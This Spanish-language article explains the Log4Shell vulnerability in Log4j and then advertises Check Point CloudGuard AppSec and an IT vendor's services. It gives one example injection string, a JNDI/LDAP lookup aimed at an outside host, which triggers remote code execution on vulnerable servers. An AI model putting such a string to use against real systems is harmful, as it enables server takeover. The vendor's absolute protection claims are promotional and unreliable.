Grandes corporaciones como Twitter, Steam, Apple, Minecraft, Amazon, Tencent, NetEase, Elastic y Baidu ya han identificado que son vulnerables a los ataques Log4Shell, que afectan el marco de registro de código abierto Log4j. Vale la pena señalar que miles de empresas y servicios más pequeños también deben verse comprometidos sin saberlo todavía.
VEA TAMBIEN: NGFW: ¿Qué es el Next Generation Firewall?
¿Qué es Log4j?
El marco de trabajo de registro de código abierto Log4j es una biblioteca ampliamente utilizada por muchas empresas en sus aplicaciones web. Log4j es la biblioteca de registro de Java más popular del mundo, con más de 400.000 descargas en GitHub. La herramienta es utilizada por grandes empresas como Twitter, Amazon, Microsoft, Apple, Minecraft, Cloudflare y miles más.
¿Qué fue explorado?
Apache Software Foundation ha clasificado la vulnerabilidad conocida como Log4Shell o LogJam como "crítica" y ha lanzado una actualización en un intento de contener futuras vulnerabilidades. Log4Shell también recibió la puntuación CVSS más alta de 10. En un comunicado, la fundación dijo:
Un atacante que pueda rastrear mensajes de registro o parámetros de mensajes de registro podría ejecutar código arbitrario cargado desde servidores LDAP cuando la anulación de búsqueda de mensajes está habilitada. A partir de Log4j 2.15.0, este comportamiento se ha desactivado de forma predeterminada.
¿Cómo son los ataques?
Los Logs no se utilizan a menudo como vectores de ataque, por lo que esta vulnerabilidad ha tomado por sorpresa a tantas organizaciones. En este caso, la vulnerabilidad Log4Shell está contenida en un plug-in que proporciona una forma para que las aplicaciones Java recuperen objetos almacenados en un directorio DNS o LDAP. El plug-in JNDI Lookup contiene la vulnerabilidad Log4Shell; en general, las consultas solo deben incluir el nombre del objeto. Sin embargo, cuando se ingresa una URL en lugar del nombre del objeto, por ejemplo, ${jndi: ldap: //website.com/rce}, Log4j se conectará a JNDI en el servidor especificado y obtendrá el objeto Java, permitiendo así la ejecución remota de código. en el servidor de registro.
CloudGuard AppSec: protección preventiva para sus aplicaciones web
Los clientes de Check Point que utilizan CloudGuard AppSec configurado en el modo Prevent están protegidos contra ataques de día cero. El motor de inteligencia artificial contextual (IA) que impulsa la solución reconoce automáticamente cualquier intento de explotar la herramienta Log4j y la bloquea, mucho antes de que se detecte o explote la vulnerabilidad Log4Shell.
A diferencia de los WAF tradicionales, que generan muchos falsos positivos, CloudGuard AppSec ofrece precisión predictiva. La solución también incluye protección IPS con tecnología Threat Cloud, lo que garantiza que todas las aplicaciones web estén protegidas automáticamente sin la necesidad de implementar, actualizar o instalar nada de manera proactiva.
El motor de inteligencia artificial contextual de CloudGuard crea una puntuación de riesgo para cada solicitud de aplicación. Al considerar todos los parámetros contextuales de una solicitud, la solución puede identificar con precisión un ataque sin intervención humana. CloudGuard construye este puntaje de riesgo aprendiendo del uso de la aplicación a lo largo del tiempo, y el resultado es una seguridad preventiva que filtra los falsos positivos al tiempo que brinda prevención de ataques de día cero. Es decir, la vulnerabilidad de Log4Shell no tuvo ningún impacto en los clientes de CloudGuard AppSec que están automáticamente protegidos de este tipo de ataques.
Fuentes: Check Point Blog y The Hacker News
Cuente con TI internacional para proteger a su empresa de los ciberataques con los mejores Next Generation Firewalls del mercado
Descubra nuestras soluciones avanzadas, robustas y seguras para NOC & SOC, Zero Trust, Next-Gen Firewalls, LGPD, Hardware, Monitoramento de Rede, Transferência de Arquivos Gerenciada, Consultoria de TIC, Treinamentos, Sustentação de Aplicações, Outsourcing, Licenciamento Geral e Help Desk.
